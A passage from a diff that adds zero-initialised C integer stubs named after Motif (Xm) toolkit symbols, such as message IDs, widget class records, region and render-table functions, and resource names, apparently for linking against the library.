+int _XmMsgComboBox_0005 = 0;
+int _XmMsgComboBox_0006 = 0;
+int _XmMsgComboBox_0007 = 0;
+int _XmMsgComboBox_0008 = 0;
+int _XmMsgComboBox_0009 = 0;
+int _XmMsgComboBox_0010 = 0;
+int _XmMsgComboBox_0011 = 0;
+int _XmMsgComboBox_0012 = 0;
+int _XmMsgComboBox_0013 = 0;
+int _XmMsgComboBox_0014 = 0;
+int _XmMsgCommand_0000 = 0;
+int _XmMsgCommand_0001 = 0;
+int _XmMsgCommand_0002 = 0;
+int _XmMsgCommand_0003 = 0;
+int _XmMsgCommand_0004 = 0;
+int _XmMsgCommand_0005 = 0;
+int _XmMsgContainer_0000 = 0;
+int _XmMsgContainer_0001 = 0;
+int _XmMsgCutPaste_0000 = 0;
+int _XmMsgCutPaste_0001 = 0;
+int _XmMsgCutPaste_0002 = 0;
+int _XmMsgCutPaste_0003 = 0;
+int _XmMsgCutPaste_0004 = 0;
+int _XmMsgCutPaste_0005 = 0;
+int _XmMsgCutPaste_0006 = 0;
+int _XmMsgCutPaste_0007 = 0;
+int _XmMsgCutPaste_0008 = 0;
+int _XmMsgCutPaste_0009 = 0;
+int _XmMsgDataF_0000 = 0;
+int _XmMsgDataF_0001 = 0;
+int _XmMsgDataF_0002 = 0;
+int _XmMsgDataF_0003 = 0;
+int _XmMsgDataF_0004 = 0;
+int _XmMsgDataF_0005 = 0;
+int _XmMsgDataF_0006 = 0;
+int _XmMsgDataFWcs_0000 = 0;
+int _XmMsgDataFWcs_0001 = 0;
+int _XmMsgDialogS_0000 = 0;
+int _XmMsgDisplay_0001 = 0;
+int _XmMsgDisplay_0002 = 0;
+int _XmMsgDisplay_0003 = 0;
+int _XmMsgDragBS_0000 = 0;
+int _XmMsgDragBS_0001 = 0;
+int _XmMsgDragBS_0002 = 0;
+int _XmMsgDragBS_0003 = 0;
+int _XmMsgDragBS_0004 = 0;
+int _XmMsgDragBS_0005 = 0;
+int _XmMsgDragBS_0006 = 0;
+int _XmMsgDragC_0001 = 0;
+int _XmMsgDragC_0002 = 0;
+int _XmMsgDragC_0003 = 0;
+int _XmMsgDragC_0004 = 0;
+int _XmMsgDragC_0005 = 0;
+int _XmMsgDragC_0006 = 0;
+int _XmMsgDragICC_0000 = 0;
+int _XmMsgDragICC_0001 = 0;
+int _XmMsgDragIcon_0000 = 0;
+int _XmMsgDragIcon_0001 = 0;
+int _XmMsgDragOverS_0000 = 0;
+int _XmMsgDragOverS_0001 = 0;
+int _XmMsgDragOverS_0002 = 0;
+int _XmMsgDragOverS_0003 = 0;
+int _XmMsgDragUnder_0000 = 0;
+int _XmMsgDragUnder_0001 = 0;
+int _XmMsgDropSMgr_0001 = 0;
+int _XmMsgDropSMgr_0002 = 0;
+int _XmMsgDropSMgr_0003 = 0;
+int _XmMsgDropSMgr_0004 = 0;
+int _XmMsgDropSMgr_0005 = 0;
+int _XmMsgDropSMgr_0006 = 0;
+int _XmMsgDropSMgr_0007 = 0;
+int _XmMsgDropSMgr_0008 = 0;
+int _XmMsgDropSMgr_0009 = 0;
+int _XmMsgDropSMgr_0010 = 0;
+int _XmMsgDropSMgrI_0001 = 0;
+int _XmMsgDropSMgrI_0002 = 0;
+int _XmMsgDropSMgrI_0003 = 0;
+int _XmMsgForm_0000 = 0;
+int _XmMsgForm_0002 = 0;
+int _XmMsgForm_0003 = 0;
+int _XmMsgGadget_0000 = 0;
+int _XmMsgLabel_0003 = 0;
+int _XmMsgLabel_0004 = 0;
+int _XmMsgList_0000 = 0;
+int _XmMsgList_0005 = 0;
+int _XmMsgList_0006 = 0;
+int _XmMsgList_0007 = 0;
+int _XmMsgList_0008 = 0;
+int _XmMsgList_0009 = 0;
+int _XmMsgList_0010 = 0;
+int _XmMsgList_0011 = 0;
+int _XmMsgList_0012 = 0;
+int _XmMsgList_0013 = 0;
+int _XmMsgList_0014 = 0;
+int _XmMsgList_0015 = 0;
+int _XmMsgMainW_0000 = 0;
+int _XmMsgMainW_0001 = 0;
+int _XmMsgManager_0000 = 0;
+int _XmMsgManager_0001 = 0;
+int _XmMsgMenuShell_0000 = 0;
+int _XmMsgMenuShell_0001 = 0;
+int _XmMsgMenuShell_0002 = 0;
+int _XmMsgMenuShell_0003 = 0;
+int _XmMsgMenuShell_0004 = 0;
+int _XmMsgMenuShell_0005 = 0;
+int _XmMsgMenuShell_0006 = 0;
+int _XmMsgMenuShell_0007 = 0;
+int _XmMsgMenuShell_0008 = 0;
+int _XmMsgMenuShell_0009 = 0;
+int _XmMsgMessageB_0003 = 0;
+int _XmMsgMessageB_0004 = 0;
+int _XmMsgMotif_0000 = 0;
+int _XmMsgMotif_0001 = 0;
+int _XmMsgNotebook_0000 = 0;
+int _XmMsgPanedW_0000 = 0;
+int _XmMsgPanedW_0001 = 0;
+int _XmMsgPanedW_0002 = 0;
+int _XmMsgPanedW_0004 = 0;
+int _XmMsgPanedW_0005 = 0;
+int _XmMsgPixConv_0000 = 0;
+int _XmMsgPrimitive_0000 = 0;
+int _XmMsgProtocols_0000 = 0;
+int _XmMsgProtocols_0001 = 0;
+int _XmMsgProtocols_0002 = 0;
+int _XmMsgRegion_0000 = 0;
+int _XmMsgRepType_0000 = 0;
+int _XmMsgRepType_0001 = 0;
+int _XmMsgRepType_0002 = 0;
+int _XmMsgResConvert_0001 = 0;
+int _XmMsgResConvert_0002 = 0;
+int _XmMsgResConvert_0003 = 0;
+int _XmMsgResConvert_0005 = 0;
+int _XmMsgResConvert_0006 = 0;
+int _XmMsgResConvert_0007 = 0;
+int _XmMsgResConvert_0008 = 0;
+int _XmMsgResConvert_0009 = 0;
+int _XmMsgResConvert_0010 = 0;
+int _XmMsgResConvert_0011 = 0;
+int _XmMsgResConvert_0012 = 0;
+int _XmMsgResConvert_0013 = 0;
+int _XmMsgResource_0001 = 0;
+int _XmMsgResource_0002 = 0;
+int _XmMsgResource_0003 = 0;
+int _XmMsgResource_0004 = 0;
+int _XmMsgResource_0005 = 0;
+int _XmMsgResource_0006 = 0;
+int _XmMsgResource_0007 = 0;
+int _XmMsgResource_0008 = 0;
+int _XmMsgResource_0009 = 0;
+int _XmMsgResource_0010 = 0;
+int _XmMsgResource_0011 = 0;
+int _XmMsgResource_0012 = 0;
+int _XmMsgResource_0013 = 0;
+int _XmMsgRowColText_0024 = 0;
+int _XmMsgRowColumn_0000 = 0;
+int _XmMsgRowColumn_0001 = 0;
+int _XmMsgRowColumn_0002 = 0;
+int _XmMsgRowColumn_0003 = 0;
+int _XmMsgRowColumn_0004 = 0;
+int _XmMsgRowColumn_0005 = 0;
+int _XmMsgRowColumn_0007 = 0;
+int _XmMsgRowColumn_0008 = 0;
+int _XmMsgRowColumn_0015 = 0;
+int _XmMsgRowColumn_0016 = 0;
+int _XmMsgRowColumn_0017 = 0;
+int _XmMsgRowColumn_0018 = 0;
+int _XmMsgRowColumn_0019 = 0;
+int _XmMsgRowColumn_0020 = 0;
+int _XmMsgRowColumn_0022 = 0;
+int _XmMsgRowColumn_0023 = 0;
+int _XmMsgRowColumn_0025 = 0;
+int _XmMsgRowColumn_0026 = 0;
+int _XmMsgRowColumn_0027 = 0;
+int _XmMsgScale_0000 = 0;
+int _XmMsgScale_0001 = 0;
+int _XmMsgScale_0002 = 0;
+int _XmMsgScale_0006 = 0;
+int _XmMsgScale_0007 = 0;
+int _XmMsgScale_0008 = 0;
+int _XmMsgScale_0009 = 0;
+int _XmMsgScaleScrBar_0004 = 0;
+int _XmMsgScreen_0000 = 0;
+int _XmMsgScreen_0001 = 0;
+int _XmMsgScrollBar_0000 = 0;
+int _XmMsgScrollBar_0001 = 0;
+int _XmMsgScrollBar_0002 = 0;
+int _XmMsgScrollBar_0003 = 0;
+int _XmMsgScrollBar_0004 = 0;
+int _XmMsgScrollBar_0005 = 0;
+int _XmMsgScrollBar_0006 = 0;
+int _XmMsgScrollBar_0007 = 0;
+int _XmMsgScrollBar_0008 = 0;
+int _XmMsgScrolledW_0004 = 0;
+int _XmMsgScrolledW_0005 = 0;
+int _XmMsgScrolledW_0006 = 0;
+int _XmMsgScrolledW_0007 = 0;
+int _XmMsgScrolledW_0008 = 0;
+int _XmMsgScrolledW_0009 = 0;
+int _XmMsgScrollFrameT_0000 = 0;
+int _XmMsgScrollFrameT_0001 = 0;
+int _XmMsgScrollVis_0000 = 0;
+int _XmMsgSelectioB_0001 = 0;
+int _XmMsgSelectioB_0002 = 0;
+int _XmMsgSpinB_0003 = 0;
+int _XmMsgSpinB_0004 = 0;
+int _XmMsgSpinB_0005 = 0;
+int _XmMsgSpinB_0006 = 0;
+int _XmMsgSpinB_0007 = 0;
+int _XmMsgSpinB_0008 = 0;
+int _XmMsgSSpinB_0001 = 0;
+int _XmMsgSSpinB_0002 = 0;
+int _XmMsgSSpinB_0003 = 0;
+int _XmMsgText_0000 = 0;
+int _XmMsgTextF_0000 = 0;
+int _XmMsgTextF_0001 = 0;
+int _XmMsgTextF_0002 = 0;
+int _XmMsgTextF_0003 = 0;
+int _XmMsgTextF_0004 = 0;
+int _XmMsgTextF_0006 = 0;
+int _XmMsgTextFWcs_0000 = 0;
+int _XmMsgTextIn_0000 = 0;
+int _XmMsgTextOut_0000 = 0;
+int _XmMsgTransfer_0000 = 0;
+int _XmMsgTransfer_0002 = 0;
+int _XmMsgTransfer_0003 = 0;
+int _XmMsgTransfer_0004 = 0;
+int _XmMsgTransfer_0005 = 0;
+int _XmMsgTransfer_0006 = 0;
+int _XmMsgTransfer_0007 = 0;
+int _XmMsgVaSimple_0000 = 0;
+int _XmMsgVaSimple_0001 = 0;
+int _XmMsgVaSimple_0002 = 0;
+int _XmMsgVendor_0000 = 0;
+int _XmMsgVendor_0001 = 0;
+int _XmMsgVendor_0002 = 0;
+int _XmMsgVendor_0003 = 0;
+int _XmMsgVisual_0000 = 0;
+int _XmMsgVisual_0001 = 0;
+int _XmMsgVisual_0002 = 0;
+int _XmMsgXmIm_0000 = 0;
+int _XmMsgXmRenderT_0000 = 0;
+int _XmMsgXmRenderT_0001 = 0;
+int _XmMsgXmRenderT_0002 = 0;
+int _XmMsgXmRenderT_0003 = 0;
+int _XmMsgXmRenderT_0004 = 0;
+int _XmMsgXmRenderT_0005 = 0;
+int _XmMsgXmString_0000 = 0;
+int _XmMsgXmTabList_0000 = 0;
+int xmMultiListClassRec = 0;
+int XmMultiListDeselectItems = 0;
+int XmMultiListDeselectRow = 0;
+int XmMultiListGetSelectedRowArray = 0;
+int XmMultiListGetSelectedRows = 0;
+int XmMultiListMakeRowVisible = 0;
+int XmMultiListSelectAllItems = 0;
+int XmMultiListSelectItems = 0;
+int XmMultiListSelectRow = 0;
+int XmMultiListToggleRow = 0;
+int XmMultiListUnselectAllItems = 0;
+int XmMultiListUnselectItem = 0;
+int xmMultiListWidgetClass = 0;
+int _XmNavigate = 0;
+int _XmNavigChangeManaged = 0;
+int _XmNavigDestroy = 0;
+int _XmNavigInitialize = 0;
+int _XmNavigResize = 0;
+int _XmNavigSetValues = 0;
+int _XmNewTravGraph = 0;
+int _XmNoneCursorIconQuark = 0;
+int xmNotebookClassRec = 0;
+int XmNotebookGetPageInfo = 0;
+int _XmNotebook_manager_translations = 0;
+int _XmNotebook_TabAccelerators = 0;
+int xmNotebookWidgetClass = 0;
+int _XmNotifyChildrenVisual = 0;
+int _XmNumDSResources = 0;
+int XmObjectAtPoint = 0;
+int _XmOffsetArrow = 0;
+int XmOptionButtonGadget = 0;
+int XmOptionLabelGadget = 0;
+int _XmOSAbsolutePathName = 0;
+int _XmOSBuildFileList = 0;
+int _XmOSBuildFileName = 0;
+int _XmOSFileCompare = 0;
+int _XmOSFindPathParts = 0;
+int _XmOSFindPatternPart = 0;
+int _XmOSGenerateMaskName = 0;
+int _XmOSGetCharDirection = 0;
+int _XmOSGetDirEntries = 0;
+int _XmOSGetHomeDirName = 0;
+int _XmOSGetInitialCharsDirection = 0;
+int _XmOSGetLocalizedString = 0;
+int XmOSGetMethod = 0;
+int _XmOSInitPath = 0;
+int _XmOSKeySymToCharacter = 0;
+int _XmOSPutenv = 0;
+int _XmOSQualifyFileSpec = 0;
+int xmOutlineClassRec = 0;
+int xmOutlineWidgetClass = 0;
+int XMoveResizeWindow = 0;
+int XMoveWindow = 0;
+int xmPanedClassRec = 0;
+int XmPanedGetPanes = 0;
+int xmPanedWidgetClass = 0;
+int xmPanedWindowClassRec = 0;
+int xmPanedWindowWidgetClass = 0;
+int _XmParentProcess = 0;
+int XmParseMappingCreate = 0;
+int XmParseMappingFree = 0;
+int XmParseMappingGetValues = 0;
+int XmParseMappingSetValues = 0;
+int XmParsePicture = 0;
+int XmParseTableFree = 0;
+int _XmPathIsTraversable = 0;
+int XmPictureDelete = 0;
+int XmPictureDeleteState = 0;
+int XmPictureDoAutoFill = 0;
+int XmPictureGetCurrentString = 0;
+int XmPictureProcessCharacter = 0;
+int _XmPngGetImage = 0;
+int _XmPopdown = 0;
+int _XmPopup = 0;
+int _XmPopupSpringLoaded = 0;
+int _XmPopWidgetExtData = 0;
+int _XmPostPopupMenu = 0;
+int _XmPrimbaseClassExtRec = 0;
+int _XmPrimClassExtRec = 0;
+int xmPrimitiveClassRec = 0;
+int _XmPrimitive_defaultTranslations = 0;
+int _XmPrimitiveEnter = 0;
+int _XmPrimitiveFocusIn = 0;
+int _XmPrimitiveFocusInInternal = 0;
+int _XmPrimitiveFocusOut = 0;
+int _XmPrimitiveGetValuesHook = 0;
+int _XmPrimitiveHelp = 0;
+int _XmPrimitiveHighlightPixmapDefault = 0;
+int _XmPrimitiveImportArgs = 0;
+int _XmPrimitiveLeave = 0;
+int _XmPrimitiveParentActivate = 0;
+int _XmPrimitiveParentCancel = 0;
+int _XmPrimitiveTopShadowPixmapDefault = 0;
+int _XmPrimitiveUnmap = 0;
+int xmPrimitiveWidgetClass = 0;
+int _XmProcessDrag = 0;
+int _XmProcessTraversal = 0;
+int XmProcessTraversal = 0;
+int xmProtocolClassRec = 0;
+int xmProtocolObjectClass = 0;
+int _XmPushB_defaultTranslations = 0;
+int _XmPushBGadClassExtRec = 0;
+int _XmPushB_menuTranslations = 0;
+int _XmPushBPrimClassExtRec = 0;
+int xmPushButtonClassRec = 0;
+int xmPushButtonGadgetClass = 0;
+int xmPushButtonGadgetClassRec = 0;
+int xmPushButtonGCacheObjClassRec = 0;
+int xmPushButtonWidgetClass = 0;
+int _XmPushWidgetExtData = 0;
+int _XmPutScaledImage = 0;
+int XmQmotif = 0;
+int XmQTaccessColors = 0;
+int XmQTaccessTextual = 0;
+int XmQTactivatable = 0;
+int XmQTcareParentVisual = 0;
+int _XmQTclipWindow = 0;
+int XmQTcontainer = 0;
+int XmQTcontainerItem = 0;
+int XmQTdialogShellSavvy = 0;
+int XmQTjoinSide = 0;
+int XmQTmenuSavvy = 0;
+int XmQTmenuSystem = 0;
+int XmQTmotifTrait = 0;
+int XmQTnavigator = 0;
+int XmQTpointIn = 0;
+int XmQTscrollFrame = 0;
+int XmQTspecifyLayoutDirection = 0;
+int XmQTspecifyRenderTable = 0;
+int XmQTspecifyUnhighlight = 0;
+int XmQTspecifyUnitType = 0;
+int XmQTtakesDefault = 0;
+int XmQTtoolTip = 0;
+int XmQTtoolTipConfig = 0;
+int XmQTtransfer = 0;
+int XmQTtraversalControl = 0;
+int _XmQualifyLabelLocalCache = 0;
+int _XmQueryPixmapCache = 0;
+int _XmQueueCount = 0;
+int _XmQueueFree = 0;
+int _XmQueueInit = 0;
+int _XmQueuePop = 0;
+int _XmRCAdaptToSize = 0;
+int _XmRC_AddPopupEventHandlers = 0;
+int _XmRC_AddToPostFromList = 0;
+int _XmRCArmAndActivate = 0;
+int _XmRC_CheckAndSetOptionCascade = 0;
+int _XmRCColorHook = 0;
+int _XmRCDoMarginAdjustment = 0;
+int _XmRC_DoProcessMenuTree = 0;
+int _XmRC_GadgetTraverseDown = 0;
+int _XmRC_GadgetTraverseLeft = 0;
+int _XmRC_GadgetTraverseRight = 0;
+int _XmRC_GadgetTraverseUp = 0;
+int _XmRCGetKidGeo = 0;
+int _XmRC_GetLabelString = 0;
+int _XmRC_GetMenuAccelerator = 0;
+int _XmRC_GetMnemonicCharSet = 0;
+int _XmRCGetTopManager = 0;
+int _XmRC_KeyboardInputHandler = 0;
+int _XmRCMenuProcedureEntry = 0;
+int _XmRC_menuSystemRecord = 0;
+int _XmRC_PostTimeOut = 0;
+int _XmRCPreferredSize = 0;
+int _XmRC_ProcessSingleWidget = 0;
+int _XmRC_RemoveFromPostFromList = 0;
+int _XmRC_RemoveFromPostFromListOnDestroyCB = 0;
+int _XmRC_RemoveHandlersFromPostFromWidget = 0;
+int _XmRC_RemovePopupEventHandlers = 0;
+int _XmRCSetKidGeo = 0;
+int _XmRC_SetMenuHistory = 0;
+int _XmRC_SetOptionMenuHistory = 0;
+int _XmRC_SetOrGetTextMargins = 0;
+int _XmRCThinkAboutSize = 0;
+int _XmRC_UpdateOptionMenuCBG = 0;
+int _XmReadDragBuffer = 0;
+int _XmReadDSFromStream = 0;
+int _XmReadImageAndHotSpotFromFile = 0;
+int _XmReadInitiatorInfo = 0;
+int _XmReasonToMessageType = 0;
+int _XmReCacheLabG = 0;
+int _XmReCacheLabG_r = 0;
+int _XmRecordEvent = 0;
+int _XmRedisplayGadgets = 0;
+int _XmRedisplayHBar = 0;
+int _XmRedisplayLabG = 0;
+int _XmRedisplayVBar = 0;
+int _XmRegionClear = 0;
+int _XmRegionComputeExtents = 0;
+int _XmRegionCreate = 0;
+int _XmRegionCreateSize = 0;
+int _XmRegionDestroy = 0;
+int _XmRegionDrawShadow = 0;
+int _XmRegionEqual = 0;
+int _XmRegionFromImage = 0;
+int _XmRegionGetExtents = 0;
+int _XmRegionGetNumRectangles = 0;
+int _XmRegionGetRectangles = 0;
+int _XmRegionIntersect = 0;
+int _XmRegionIntersectRectWithRegion = 0;
+int _XmRegionIsEmpty = 0;
+int _XmRegionOffset = 0;
+int _XmRegionPointInRegion = 0;
+int _XmRegionSetGCRegion = 0;
+int _XmRegionShrink = 0;
+int _XmRegionSubtract = 0;
+int _XmRegionUnion = 0;
+int _XmRegionUnionRectWithRegion = 0;
+int _XmRegisterConverters = 0;
+int XmRegisterConverters = 0;
+int _XmRegisterPixmapConverters = 0;
+int XmRegisterSegmentEncoding = 0;
+int _XmRemoveAllCallbacks = 0;
+int _XmRemoveCallback = 0;
+int XmRemoveFromPostFromList = 0;
+int _XmRemoveGrab = 0;
+int _XmRemoveHashEntry = 0;
+int _XmRemoveHashIterator = 0;
+int XmRemoveProtocolCallback = 0;
+int XmRemoveProtocols = 0;
+int XmRemoveTabGroup = 0;
+int _Xm_RemQueue = 0;
+int _XmRenderCacheGet = 0;
+int _XmRenderCacheSet = 0;
+int XmRenderTableAddRenditions = 0;
+int XmRenderTableCopy = 0;
+int XmRenderTableCvtFromProp = 0;
+int XmRenderTableCvtToProp = 0;
+int _XmRenderTableDisplay = 0;
+int _XmRenderTableFindFallback = 0;
+int _XmRenderTableFindFirstFont = 0;
+int _XmRenderTableFindRendition = 0;
+int XmRenderTableFree = 0;
+int XmRenderTableGetDefaultFontExtents = 0;
+int XmRenderTableGetRendition = 0;
+int XmRenderTableGetRenditions = 0;
+int XmRenderTableGetTags = 0;
+int _XmRenderTableRemoveRenditions = 0;
+int XmRenderTableRemoveRenditions = 0;
+int _XmRenditionCopy = 0;
+int _XmRenditionCreate = 0;
+int XmRenditionCreate = 0;
+int XmRenditionFree = 0;
+int _XmRenditionMerge = 0;
+int XmRenditionRetrieve = 0;
+int XmRenditionUpdate = 0;
+int _XmReOrderResourceList = 0;
+int XmRepTypeAddReverse = 0;
+int XmRepTypeGetId = 0;
+int XmRepTypeGetNameList = 0;
+int XmRepTypeGetRecord = 0;
+int XmRepTypeGetRegistered = 0;
+int _XmRepTypeInstallConverters = 0;
+int XmRepTypeInstallTearOffModelConverter = 0;
+int XmRepTypeRegister = 0;
+int XmRepTypeValidValue = 0;
+int _XmRequestNewSize = 0;
+int _XmResetTravGraph = 0;
+int _XmResizeHashTable = 0;
+int _XmResizeObject = 0;
+int _XmResizeWidget = 0;
+int XmResolveAllPartOffsets = 0;
+int XmResolveAllPartOffsets64 = 0;
+int XmResolvePartOffsets = 0;
+int _XmRestoreCoreClassTranslations = 0;
+int _XmRestoreExcludedTearOffToToplevelShell = 0;
+int _XmRestoreTearOffToMenuShell = 0;
+int _XmRestoreTearOffToToplevelShell = 0;
+int _XmRootGeometryManager = 0;
+int _XmRowColumn_bar_table = 0;
+int xmRowColumnClassRec = 0;
+int _XmRowColumn_menu_table = 0;
+int _XmRowColumn_menu_traversal_table = 0;
+int _XmRowColumn_option_table = 0;
+int xmRowColumnWidgetClass = 0;
+int _XmSaccelerator = 0;
+int _XmSacceleratorText = 0;
+int _XmSactivateCallback = 0;
+int _XmSadjustLast = 0;
+int _XmSadjustMargin = 0;
+int _XmSalignment = 0;
+int _XmSallowOverlap = 0;
+int _XmSallowResize = 0;
+int _XmSanimationMask = 0;
+int _XmSanimationPixmap = 0;
+int _XmSanimationPixmapDepth = 0;
+int _XmSanimationStyle = 0;
+int _XmSapplyCallback = 0;
+int _XmSapplyLabelString = 0;
+int _XmSarmCallback = 0;
+int _XmSarmColor = 0;
+int _XmSarmPixmap = 0;
+int _XmSarrowDirection = 0;
+int xmSashClassRec = 0;
+int _XmSash_defTranslations = 0;
+int xmSashWidgetClass = 0;
+int _XmSattachment = 0;
+int _XmSaudibleWarning = 0;
+int _XmSautomaticSelection = 0;
+int _XmSautoShowCursorPosition = 0;
+int _XmSautoUnmanage = 0;
+int _XmSavailability = 0;
+int _XmSaveCoreClassTranslations = 0;
+int _XmSaveMenuProcContext = 0;
+int _XmSblendModel = 0;
+int _XmSblinkRate = 0;
+int _XmSbottomAttachment = 0;
+int _XmSbottomOffset = 0;
+int _XmSbottomPosition = 0;
+int _XmSbottomShadowColor = 0;
+int _XmSbottomShadowPixmap = 0;
+int _XmSbottomWidget = 0;
+int _XmSbrowseSelectionCallback = 0;
+int _XmSbuttonAccelerators = 0;
+int _XmSbuttonAcceleratorText = 0;
+int _XmSbuttonCount = 0;
+int _XmSbuttonFontList = 0;
+int _XmSbuttonMnemonicCharSets = 0;
+int _XmSbuttonMnemonics = 0;
+int _XmSbuttons = 0;
+int _XmSbuttonSet = 0;
+int _XmSbuttonType = 0;
+int _XmSCAccelerator = 0;
+int _XmSCAcceleratorText = 0;
+int _XmSCAdjustLast = 0;
+int _XmSCAdjustMargin = 0;
+int xmScaleClassRec = 0;
+int _XmScaleGetTitleString = 0;
+int XmScaleGetValue = 0;
+int XmScaleSetTicks = 0;
+int XmScaleSetValue = 0;
+int xmScaleWidgetClass = 0;
+int _XmSCAlignment = 0;
+int _XmSCAllowOverlap = 0;
+int _XmScancelButton = 0;
+int _XmScancelCallback = 0;
+int _XmScancelLabelString = 0;
+int _XmSCAnimationMask = 0;
+int _XmSCAnimationPixmap = 0;
+int _XmSCAnimationPixmapDepth = 0;
+int _XmSCAnimationStyle = 0;
+int _XmScanningCacheGet = 0;
+int _XmScanningCacheSet = 0;
+int _XmSCApplyLabelString = 0;
+int _XmSCArmCallback = 0;
+int _XmSCArmColor = 0;
+int _XmSCArmPixmap = 0;
+int _XmSCArrowDirection = 0;
+int _XmScascadeButton = 0;
+int _XmScascadePixmap = 0;
+int _XmScascadingCallback = 0;
+int _XmSCAtomList = 0;
+int _XmSCAttachment = 0;
+int _XmSCAudibleWarning = 0;
+int _XmSCAutomaticSelection = 0;
+int _XmSCAutoShowCursorPosition = 0;
+int _XmSCAutoUnmanage = 0;
+int _XmSCAvailability = 0;
+int _XmSCBackgroundPixmap = 0;
+int _XmSCBlendModel = 0;
+int _XmSCBlinkRate = 0;
+int _XmSCBooleanDimension = 0;
+int _XmSCBottomShadowColor = 0;
+int _XmSCBottomShadowPixmap = 0;
+int _XmSCButtonAccelerators = 0;
+int _XmSCButtonAcceleratorText = 0;
+int _XmSCButtonCount = 0;
+int _XmSCButtonFontList = 0;
+int _XmSCButtonMnemonicCharSets = 0;
+int _XmSCButtonMnemonics = 0;
+int _XmSCButtons = 0;
+int _XmSCButtonSet = 0;
+int _XmSCButtonType = 0;
+int _XmSCCallbackProc = 0;
+int _XmSCCancelLabelString = 0;
+int _XmSCChar = 0;
+int _XmSCCharSetTable = 0;
+int _XmSCChildHorizontalAlignment = 0;
+int _XmSCChildHorizontalSpacing = 0;
+int _XmSCChildPlacement = 0;
+int _XmSCChildren = 0;
+int _XmSCChildType = 0;
+int _XmSCChildVerticalAlignment = 0;
+int _XmSCClientData = 0;
+int _XmSCClipWindow = 0;
+int _XmSCColumns = 0;
+int _XmSCCommandWindow = 0;
+int _XmSCCommandWindowLocation = 0;
+int _XmSCCompoundText = 0;
+int _XmSCConvertProc = 0;
+int _XmSCCursorBackground = 0;
+int _XmSCCursorForeground = 0;
+int _XmSCCursorPosition = 0;
+int _XmSCCursorPositionVisible = 0;
+int _XmSCDarkThreshold = 0;
+int _XmSCDecimalPoints = 0;
+int _XmSCDefaultButtonShadowThickness = 0;
+int _XmSCDefaultButtonType = 0;
+int _XmSCDefaultCopyCursorIcon = 0;
+int _XmSCDefaultFontList = 0;
+int _XmSCDefaultInvalidCursorIcon = 0;
+int _XmSCDefaultLinkCursorIcon = 0;
+int _XmSCDefaultMoveCursorIcon = 0;
+int _XmSCDefaultNoneCursorIcon = 0;
+int _XmSCDefaultPosition = 0;
+int _XmSCDefaultSourceCursorIcon = 0;
+int _XmSCDefaultValidCursorIcon = 0;
+int _XmSCDeleteResponse = 0;
+int _XmSCDesktopParent = 0;
+int _XmSCDialogStyle = 0;
+int _XmSCDialogTitle = 0;
+int _XmSCDialogType = 0;
+int _XmSCDirectory = 0;
+int _XmSCDirectoryValid = 0;
+int _XmSCDirListItemCount = 0;
+int _XmSCDirListItems = 0;
+int _XmSCDirListLabelString = 0;
+int _XmSCDirMask = 0;
+int _XmSCDirSearchProc = 0;
+int _XmSCDirSpec = 0;
+int _XmSCDisarmCallback = 0;
+int _XmSCDoubleClickInterval = 0;
+int _XmSCDragContextClass = 0;
+int _XmSCDragDropFinishCallback = 0;
+int _XmSCDragIconClass = 0;
+int _XmSCDragInitiatorProtocolStyle = 0;
+int _XmSCDragMotionCallback = 0;
+int _XmSCDragOperations = 0;
+int _XmSCDragOverMode = 0;
+int _XmSCDragProc = 0;
+int _XmSCDragReceiverProtocolStyle = 0;
+int _XmSCDropProc = 0;
+int _XmSCDropRectangles = 0;
+int _XmSCDropSiteActivity = 0;
+int _XmSCDropSiteEnterCallback = 0;
+int _XmSCDropSiteLeaveCallback = 0;
+int _XmSCDropSiteManagerClass = 0;
+int _XmSCDropSiteOperations = 0;
+int _XmSCDropSiteType = 0;
+int _XmSCDropStartCallback = 0;
+int _XmSCDropTransferClass = 0;
+int _XmSCDropTransfers = 0;
+int _XmSCEditable = 0;
+int _XmSCEntryBorder = 0;
+int _XmSCEntryClass = 0;
+int _XmSCExportTargets = 0;
+int _XmSCExposeCallback = 0;
+int _XmSCExtensionType = 0;
+int _XmSCFileListItemCount = 0;
+int _XmSCFileListItems = 0;
+int _XmSCFileListLabelString = 0;
+int _XmSCFileSearchProc = 0;
+int _XmSCFileTypeMask = 0;
+int _XmSCFillOnArm = 0;
+int _XmSCFillOnSelect = 0;
+int _XmSCFilterLabelString = 0;
+int _XmSCFontList = 0;
+int _XmSCFONTLIST_DEFAULT_TAG_STRING = 0;
+int _XmSCForegroundThreshold = 0;
+int _XmSCGadgetPixmap = 0;
+int _XmScheckButton = 0;
+int _XmSCHelpLabelString = 0;
+int _XmSCHighlightColor = 0;
+int _XmSCHighlightOnEnter = 0;
+int _XmSCHighlightPixmap = 0;
+int _XmSCHighlightThickness = 0;
+int _XmSchildHorizontalAlignment = 0;
+int _XmSchildHorizontalSpacing = 0;
+int _XmSchildPlacement = 0;
+int _XmSchildPosition = 0;
+int _XmSchildType = 0;
+int _XmSchildVerticalAlignment = 0;
+int _XmSCHorizontalDimension = 0;
+int _XmSCHorizontalFontUnit = 0;
+int _XmSCHorizontalInt = 0;
+int _XmSCHorizontalPosition = 0;
+int _XmSCHorizontalScrollBar = 0;
+int _XmSCHot = 0;
+int _XmSCICCHandle = 0;
+int _XmSCIconAttachment = 0;
+int _XmSCImportTargets = 0;
+int _XmSCIncrement = 0;
+int _XmSCIncremental = 0;
+int _XmSCIndicatorOn = 0;
+int _XmSCIndicatorSize = 0;
+int _XmSCIndicatorType = 0;
+int _XmSCInitialDelay = 0;
+int _XmSCInitialFocus = 0;
+int _XmSCInputCreate = 0;
+int _XmSCInputMethod = 0;
+int _XmSCInvalidCursorForeground = 0;
+int _XmSCIsAligned = 0;
+int _XmSCIsHomogeneous = 0;
+int _XmSCISO8859_DASH_1 = 0;
+int _XmSCItemCount = 0;
+int _XmSCItems = 0;
+int _XmSCKeyboardFocusPolicy = 0;
+int _XmSCKeySym = 0;
+int _XmSCKeySymTable = 0;
+int _XmSCLabelFontList = 0;
+int _XmSCLabelInsensitivePixmap = 0;
+int _XmSCLabelPixmap = 0;
+int _XmSCLabelString = 0;
+int _XmSCLabelType = 0;
+int _XmSclientData = 0;
+int _XmSCLightThreshold = 0;
+int _XmSclipWindow = 0;
+int _XmSCListLabelString = 0;
+int _XmSCListMarginHeight = 0;
+int _XmSCListMarginWidth = 0;
+int _XmSCListSizePolicy = 0;
+int _XmSCListSpacing = 0;
+int _XmSCListUpdated = 0;
+int _XmSCLogicalParent = 0;
+int _XmSCMainWindowMarginHeight = 0;
+int _XmSCMainWindowMarginWidth = 0;
+int _XmSCManBottomShadowPixmap = 0;
+int _XmSCManForegroundPixmap = 0;
+int _XmSCManHighlightPixmap = 0;
